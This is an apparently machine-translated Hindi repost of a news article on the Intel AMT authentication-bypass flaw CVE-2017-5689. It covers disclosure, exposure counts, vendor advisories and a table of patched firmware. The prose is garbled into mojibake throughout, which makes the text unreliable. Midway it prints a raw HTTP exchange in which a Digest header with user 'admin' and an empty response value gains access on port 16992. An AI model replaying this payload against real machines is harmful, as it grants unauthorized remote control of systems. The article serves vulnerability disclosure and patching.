рдЗрдВрдЯреЗрд▓ AMT рдореЗрдВ рднреЗрджреНрдпрддрд╛ рдЙрдирдХреЗ рд╡рд┐рдЪрд╛рд░ рд╕реЗ рдЕрдзрд┐рдХ рдЧрдВрднреАрд░ рдирд┐рдХрд▓реА



1 рдордИ, 2017 рдХреЛ, рдЗрдВрдЯреЗрд▓ рдиреЗ рд╕рдХреНрд░рд┐рдп рдкреНрд░рдмрдВрдзрди рдкреНрд░реМрджреНрдпреЛрдЧрд┐рдХреА (рдПрдПрдордЯреА) (INTEL-SA-00075 рднреЗрджреНрдпрддрд╛, рдЬрд┐рд╕реЗ CVE-2017-5689 рдХреЗ рд░реВрдк рдореЗрдВ рднреА рдЬрд╛рдирд╛ рдЬрд╛рддрд╛ рд╣реИ ) рдореЗрдВ рдПрдХ рдорд╣рддреНрд╡рдкреВрд░реНрдг рднреЗрджреНрдпрддрд╛ рдХреА рдШреЛрд╖рдгрд╛ рдХреАред рдПрдВрдмреА рд╕реЗ рдореИрдХреНрд╕рд┐рдо рдорд╛рд▓реБрдЯрд┐рди рджреНрд╡рд╛рд░рд╛ рднреЗрджреНрдпрддрд╛ рдкрд╛рдИ рдЧрдИ , рд▓реЗрдХрд┐рди рдЖрдзрд┐рдХрд╛рд░рд┐рдХ рдШреЛрд╖рдгрд╛ рддрдХ рдЗрдВрдЯреЗрд▓ рдХреЗ рдЕрдиреБрд░реЛрдз рдкрд░ рдЗрд╕реЗ рдЧреБрдкреНрдд рд░рдЦрд╛ рдЧрдпрд╛ред

рдЗрдВрдЯреЗрд▓ рдПрдПрдордЯреА рдПрдХ рд╣рд╛рд░реНрдбрд╡реЗрдпрд░ рддрдХрдиреАрдХ рд╣реИ рдЬреЛ рдХрдВрдкреНрдпреВрдЯрд░ рдХреА рд╕реЗрдЯрд┐рдВрдЧреНрд╕ рдФрд░ рд╕реБрд░рдХреНрд╖рд╛ рдХрд╛ рдкреНрд░рдмрдВрдзрди рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд░рд┐рдореЛрдЯ (рдФрд░ рдПрдХ рд╕реНрд╡рддрдВрддреНрд░ рд╕рд╣рд╛рдпрдХ рдЯреАрд╕реАрдкреА / рдЖрдИрдкреА рдЪреИрдирд▓ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ) рдкреНрд░рджрд╛рди рдХрд░рддреА рд╣реИ, рднрд▓реЗ рд╣реА рдмрд┐рдЬрд▓реА рдХреА рд╕реНрдерд┐рддрд┐ (рд░рд┐рдореЛрдЯ / рдСрди / рд░рд┐рдореЛрдЯ рдХрдВрдкреНрдпреВрдЯрд░) рдФрд░ рдУрдПрд╕ рд░рд╛рдЬреНрдп рдХреА рдкрд░рд╡рд╛рд╣ рдХрд┐рдП рдмрд┐рдирд╛ред рддрдХрдиреАрдХ рдХреЛ рдЪрд┐рдкрд╕реЗрдЯ рдореЗрдВ рдПрдХреАрдХреГрдд рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИред рдпрджрд┐ рдЖрдк рдЗрд╕реЗ рд░реИрдо рдФрд░ рдкреАрд╕реА рдбреНрд░рд╛рдЗрд╡ рдХреЛ рд╕реНрдХреИрди рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдПрдХ рдПрдВрдЯреА-рд░реВрдЯрдХрд┐рдЯ рдХреЗ рд░реВрдк рдореЗрдВ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реИрдВ, рддреЛ рдРрд╕реА рд╕реБрд░рдХреНрд╖рд╛ рдХреЛ рджрд░рдХрд┐рдирд╛рд░ рдХрд░рдиреЗ рдХрд╛ рдХреЛрдИ рддрд░реАрдХрд╛ рдирд╣реАрдВ рд╣реИред рдЗрд╕рд╕реЗ рднреА рдмрджрддрд░, рджреВрд░рд╕реНрде AMT рдЕрдиреБрд░реЛрдз рд▓реЙрдЧ рдирд╣реАрдВ рд╣реИрдВред

рдЕрдм рдЦреБрд▓реЗ AMT рдкреЛрд░реНрдЯ рдХреЗ рд╕рд╛рде 8500 рд╕реЗ рдЕрдзрд┐рдХ рд╕рд┐рд╕реНрдЯрдо рджреНрд╡рд╛рд░рд╛ Shodan рдХрд╛ рдЕрдиреБрд░реЛрдз рдЬрд╛рд░реА рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рдХреБрдЫ BIOS рдлрд░реНрдорд╡реЗрдпрд░ рдХреЗ рд▓рд┐рдП, рдкреИрдЪ рдЕрднреА рддрдХ рдЬрд╛рд░реА рдирд╣реАрдВ рдХрд┐рдП рдЧрдП рд╣реИрдВ рдЬреЛ рдПрдПрдордЯреА рдореЗрдВ рдмрдЧ рдХреЛ рдареАрдХ рдХрд░рддреЗ рд╣реИрдВред

рдПрдПрдордЯреА рддрдХрдиреАрдХ рд╕рд┐рд╕реНрдЯрдо рдкреНрд░рд╢рд╛рд╕рдХ рдХреЛ рд╕рд┐рд╕реНрдЯрдо рдореЗрдВ рд╡рд┐рднрд┐рдиреНрди рдХреНрд░рд┐рдпрд╛рдУрдВ рдХреЛ рджреВрд░рд╕реНрде рд░реВрдк рд╕реЗ рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддреА рд╣реИ: рдХрдВрдкреНрдпреВрдЯрд░ рдмрдВрдж рдХрд░реЗрдВ, рдмреВрдЯрд▓реЛрдбрд░ рдХреЛрдб рдмрджрд▓реЗрдВ, рдЗрдирдкреБрдЯ рдЙрдкрдХрд░рдгреЛрдВ рдХреЛ рдирд┐рдпрдВрддреНрд░рд┐рдд рдХрд░реЗрдВ, рдирд┐рд╖реНрдкрд╛рджрди рдпреЛрдЧреНрдп рдХрд╛рд░реНрдпрдХреНрд░рдо рдЗрддреНрдпрд╛рджрд┐ рд╡рд╛рд╕реНрддрд╡ рдореЗрдВ, рдПрдПрдордЯреА рдЖрдкрдХреЛ рдЙрди рд╕рднреА рдХрд╛рд░реНрдпреЛрдВ рдХреЛ рджреВрд░рд╕реНрде рд░реВрдк рд╕реЗ рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИ рдЬреЛ рдЖрдк рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред рдкреАрд╕реА рддрдХ рднреМрддрд┐рдХ рдкрд╣реБрдБрдЪ рд╣реЛрдирд╛ред

рдкреНрд░реМрджреНрдпреЛрдЧрд┐рдХреА рдХреЗ рд╡рд░реНрдгрди рдХреЛ рдкрдврд╝рдиреЗ рдХреЗ рдмрд╛рдж, рдЖрдк рдХрд▓реНрдкрдирд╛ рдХрд░рдирд╛ рд╢реБрд░реВ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдХрд┐ рдПрдПрдордЯреА рддрдХрдиреАрдХ рдХреЗ рд╕рд╛рде рдПрдХ рдмрдВрдж рдХрдВрдкреНрдпреВрдЯрд░ рдореЗрдВ рд░рд┐рдореЛрдЯ рдПрдХреНрд╕реЗрд╕ рд╣реЛрдиреЗ рд╕реЗ рдХрд┐рд╕реА рд╣реИрдХрд░ рдХреЛ рдХреНрдпрд╛ рдЕрд╡рд╕рд░ рдорд┐рд▓рддреЗ рд╣реИрдВред рддреЛ, рдЖрдкрдХреА рдХрд▓реНрдкрдирд╛рдПрдБ рд╕рдЪ рдирд┐рдХрд▓реАрдВ ред рдПрдПрдордЯреА рдХрд╛ рд░рд┐рдореЛрдЯ рдПрдХреНрд╕реЗрд╕ рдПрдХ рдмреНрд░рд╛рдЙрдЬрд╝рд░ рдореЗрдВ рдПрдХ рд╡реЗрдм рдЗрдВрдЯрд░рдлреЗрд╕ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдкреНрд░рджрд╛рди рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рдЬреИрд╕рд╛ рдХрд┐ рдореИрдХреНрд╕рд┐рдо рдХреЛ рдкрддрд╛ рдЪрд▓рд╛ рд╣реИ, рдХреЛрдИ рднреА рдХреНрд░рд┐рдкреНрдЯреЛрдЧреНрд░рд╛рдлрд┐рдХ рд╣реИрд╢ рдпрд╛ рдХреЛрдИ рднреА рдмрд┐рд▓реНрдХреБрд▓ рднреА рдбрд╛рдЗрдЬреЗрд╕реНрдЯ рдСрдереЗрдВрдЯрд┐рдХреЗрд╢рди рдХреЗ рд▓рд┐рдП рдЙрдкрдпреБрдХреНрдд рдирд╣реАрдВ рд╣реИред рдпрд╣реА рд╣реИ, рдкреНрд░рд╛рдзрд┐рдХрд░рдг рдлреЙрд░реНрдо рдореЗрдВ рд╕рдВрдмрдВрдзрд┐рдд рдХреНрд╖реЗрддреНрд░ рдХреЛ рдЖрдо рддреМрд░ рдкрд░ рдЦрд╛рд▓реА рдЫреЛрдбрд╝рд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред

рдпрд╣ рдПрдХ рдкрд┐рдЫрд▓реЗ рджрд░рд╡рд╛рдЬреЗ рдХреА рддрд░рд╣ рднреА рдирд╣реАрдВ рджрд┐рдЦрддрд╛ рд╣реИ, рдХреНрдпреЛрдВрдХрд┐ рдЗрд╕ рддрд░рд╣ рдХреЗ рдЕрдирд╛рдбрд╝реА рддрд░реАрдХреЗ рд╕реЗ рдХреМрди рдЗрд╕реЗ рд▓рд╛рдЧреВ рдХрд░реЗрдЧрд╛?

2010-2011 рд░рд┐рд▓реАрдЬрд╝ (рдХрдордЬреЛрд░ рдлрд░реНрдорд╡реЗрдпрд░ рдХреА рд╕реВрдЪреА, рдиреАрдЪреЗ рджреЗрдЦреЗрдВ) рдХреЗ рдмрд╛рдж рдХрдордЬреЛрд░ рд╕рд┐рд╕реНрдЯрдоред рдпрд╣ 100% рдЖрд░рд╕реАрдИ рдирд╣реАрдВ рд╣реИ, рдмрд▓реНрдХрд┐ рдПрдХ рддрд╛рд░реНрдХрд┐рдХ рднреЗрджреНрдпрддрд╛ рд╣реИред рдореИрдХреНрд╕рд┐рдо рдорд╛рд▓реНрдпреБрдЯрд┐рди рдХрд╛ рдорд╛рдирдирд╛ тАЛтАЛрд╣реИ рдХрд┐ рдХрдИ рд╣рдорд▓реЗ рд╡реИрдХреНрдЯрд░ рд╣реИрдВ, рдХреИрд╕реЗ рдПрдХ рд╣рдорд▓рд╛рд╡рд░ рдЗрд╕ рднреЗрджреНрдпрддрд╛ рдХрд╛ рдлрд╛рдпрджрд╛ рдЙрдард╛ рд╕рдХрддрд╛ рд╣реИ, рд╕рдВрднрд╡рддрдГ рдЗрдВрдЯреЗрд▓ рдПрдПрдордЯреА рд╕рдорд░реНрдерди рдХреЗ рдмрд┐рдирд╛ рдЗрдВрдЯреЗрд▓ рд╕рд┐рд╕реНрдЯрдо рдкрд░ рднреАред

"рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдЕрднреА рднреА рдХрд╛рдо рдХрд░рддрд╛ рд╣реИ, " рдорд╛рд▓реБрдЯрд┐рди рдиреЗ рд╕рдордЭрд╛рдпрд╛ ред "рд╣рдореЗрдВ рдЗрд╕рдХреЗ рдЪрд╛рд░реЛрдВ рдУрд░ рдПрдХ рд░рд╛рд╕реНрддрд╛ рдорд┐рд▓рд╛ред"

рдПрдХ рд╡реЗрдм рдмреНрд░рд╛рдЙрдЬрд╝рд░ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ, рдЖрдк рдПрдПрдордЯреА рдХрд╛рд░реНрдпреЛрдВ рдХреЗ рд▓рд┐рдП рдкреВрд░реНрдг рдкрд╣реБрдВрдЪ рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рдЬреИрд╕реЗ рдХрд┐ рдЖрдк рд╕рд┐рд╕реНрдЯрдо рдореЗрдВ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдкрд╛рд╕рд╡рд░реНрдб рдХреЛ рдкрд╣рдЪрд╛рдирддреЗ рд╣реИрдВред 127.0.0.1:16992 рдкрд░ рд╕реНрдерд╛рдиреАрдп рдкреНрд░реЙрдХреНрд╕реА рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдХрд╛ рддрд░реАрдХрд╛ рдпрд╣рд╛рдВ рдмрддрд╛рдпрд╛ рдЧрдпрд╛ рд╣реИ:

GET /index.htm HTTP/1.1 Host: 127.0.0.1:16992 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive HTTP/1.1 401 Unauthorized WWW-Authenticate: Digest realm="Digest:048A0000000000000000000000000000", nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n",stale="false",qop="auth" Content-Type: text/html Server: AMT Content-Length: 678 Connection: close GET /index.htm HTTP/1.1 Host: 127.0.0.1:16992 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Authorization: Digest username="admin", realm="Digest:048A0000000000000000000000000000", nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n", uri="/index.htm", response="", qop=auth, nc=00000001, cnonce="60513ab58858482c" HTTP/1.1 200 OK Date: Thu, 4 May 2017 16:09:17 GMT Server: AMT Content-Type: text/html Transfer-Encoding: chunked Cache-Control: no cache Expires: Thu, 26 Oct 1995 00:00:00 GMT 04E6 

рдЬрд╛рдирдХрд╛рд░реА рдХреЗ рдкреНрд░рдХрдЯреАрдХрд░рдг рдХреЗ рдХреБрдЫ рджрд┐рдиреЛрдВ рдмрд╛рдж, рдЯреЗрдВрдЯреИрдХреНрдЯ рдиреЗ рдПрдПрдордЯреА рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдореЗрдВ рд╡реГрджреНрдзрд┐ рдХреЗ рд╕рд╛рде рдПрдХ рдорд╣рддреНрд╡рдкреВрд░реНрдг рднреЗрджреНрдпрддрд╛ рдХрд╛ рджреЛрд╣рди тАЛтАЛрдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдПрдХ рд╢реЛрд╖рдг рдЬрд╛рд░реА рдХрд┐рдпрд╛ ред рдХрдВрдкрдиреА рдиреЗ рдЕрдкрдиреЗ рдиреЗрдЯрд╡рд░реНрдХ рдкрд░ рдХрдордЬреЛрд░ рдкреНрд░рдгрд╛рд▓рд┐рдпреЛрдВ рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛рдиреЗ рдХреЗ рд▓рд┐рдП рдЗрд╕ рдЙрдкрдХрд░рдг рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдХрд╛ рд╕реБрдЭрд╛рд╡ рджрд┐рдпрд╛ред рддрд╛рдХрд┐ рд╕рд┐рд╕реНрдЯрдо рдПрдбрдорд┐рдирд┐рд╕реНрдЯреНрд░реЗрдЯрд░ рдХреЛ рдкрддрд╛ рдЪрд▓реЗ рдХрд┐ рдирдП рдлрд░реНрдорд╡реЗрдпрд░ рд╡рд░реНрдЬрди рдХрд╣рд╛рдВ рдЗрдВрд╕реНрдЯреЙрд▓ рдХрд░рдиреЗ рд╣реИрдВред рд╢реЛрд╖рдг рдХреЛ рдиреЗрд╕рд╕ рдкреНрд▓рдЧрдЗрди рдХреЗ рд░реВрдк рдореЗрдВ рд▓рд╛рдЧреВ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИред

рдЙрд╕реА рджрд┐рди, рд╕рд░реНрд╡рд░ рдФрд░ рд╡реНрдпрдХреНрддрд┐рдЧрдд рдХрдВрдкреНрдпреВрдЯрд░реЛрдВ рдХреЗ рд╕рдмрд╕реЗ рдмрдбрд╝реЗ рдирд┐рд░реНрдорд╛рддрд╛рдУрдВ рдиреЗ рдЕрдкрдиреЗ рдЧреНрд░рд╛рд╣рдХреЛрдВ рдХреЗ рд▓рд┐рдП рдЖрдзрд┐рдХрд╛рд░рд┐рдХ рд╕реБрд░рдХреНрд╖рд╛ рд╕рдВрджреЗрд╢ рдЬрд╛рд░реА рдХрд┐рдП: рдПрдЪрдкреА рдХрд╛ рдПрдХ рд╕рдВрджреЗрд╢ , рдбреЗрд▓ рдХрд╛ , рд▓реЗрдиреЛрд╡реЛ рдХрд╛ , рдлрд╝реБрдЬрд┐рддреНрд╕реБ рдХрд╛ ред рдЕрд╕реБрд░рдХреНрд╖рд┐рдд рдлрд░реНрдорд╡реЗрдпрд░ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рд╡рд┐рд╕реНрддреГрдд рдЬрд╛рдирдХрд╛рд░реА рд╣реЛрдЧреА рдФрд░ рдЕрджреНрдпрддрди рд╕рдВрд╕реНрдХрд░рдгреЛрдВ рдХреЗ рд▓рд┐рдВрдХ рдЙрдкрд▓рдмреНрдз рд╣реЛрддреЗ рд╣реА рджрд┐рдЦрд╛рдИ рджреЗрдВрдЧреЗред

рдЗрдВрдЯреЗрд▓ рд╕реЗ рдкреИрдЪ рдлрд░реНрдорд╡реЗрдпрд░ рдХреА рд╕реВрдЪреА
рдХрдордЬреЛрд░ рд╕рдВрд╕реНрдХрд░рдг
рдлрд░реНрдорд╡реЗрдпрд░
рдкрд░реНрдпрд╛рдкреНрдд
рд╕реАрдкреАрдпреВ рдкреАрдврд╝реА
рд╕рдордЭреМрддрд╛
рдлрд░реНрдорд╡реЗрдпрд░
6.0.xx.xxxx

1 рд╕реЗрдВрдЯ рдХреЛрд░

6.2.61.3535

6.1.xx.xxxx

6.2.61.3535

6.2.xx.xxxx

6.2.61.3535

7.0.xx.xxxx

2 рдПрди рдбреА рдЬрдирд░рд▓ рдХреЛрд░

7.1.91.3272

7.1.xx.xxxx

7.1.91.3272

8.0.xx.xxxx

3 рдЖрд░рдбреА рдЬрдирд░рд▓ рдХреЛрд░

8.1.71.3608

8.1.xx.xxxx

8.1.71.3608

9.0.xx.xxxx

4 рд╡реЗрдВ рдЬрдирд░рд▓ рдХреЛрд░



9.1.41.3024

9.1.xx.xxxx

9.1.41.3024

9.5.xx.xxxx

9.5.61.3012

10.0.xx.xxxx

5 рд╡реЗрдВ рдЬрдирд░рд▓ рдХреЛрд░

10.0.55.3000

11.0.xx.xxxx

6 рд╡реЗрдВ рдЬрдирд░рд▓ рдХреЛрд░

11.0.25.3001

11.0.22.3001

11.0.18.3003

11.5.xx.xxxx

7 рд╡реЗрдВ рдЬрдирд░рд▓ рдХреЛрд░

11.6.27.3264

11.6.xx.xxxx

11.6.27.3264

11.6.12.3202

рдЗрдВрдЯреЗрд▓ рдиреЗ рд╡рд┐рдВрдбреЛрдЬ 7/10 рдХреЗ рддрд╣рдд рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдХреЗ рд▓рд┐рдП рд╕рд┐рд╕реНрдЯрдо рдХреА рдЬрд╛рдВрдЪ рдХреЗ рд▓рд┐рдП рдПрдХ рдЖрдзрд┐рдХрд╛рд░рд┐рдХ рдЯреВрд▓ рдЬрд╛рд░реА рдХрд┐рдпрд╛ рд╣реИ, рд╕рд╛рде рд╣реА рдЗрд╕рдХреЗ рдЙрдкрдпреЛрдЧ рдХреЗ рд▓рд┐рдП рдПрдХ рдЧрд╛рдЗрдб рднреА рд╣реИред

Source: https://habr.com/ru/post/hi403713/


All Articles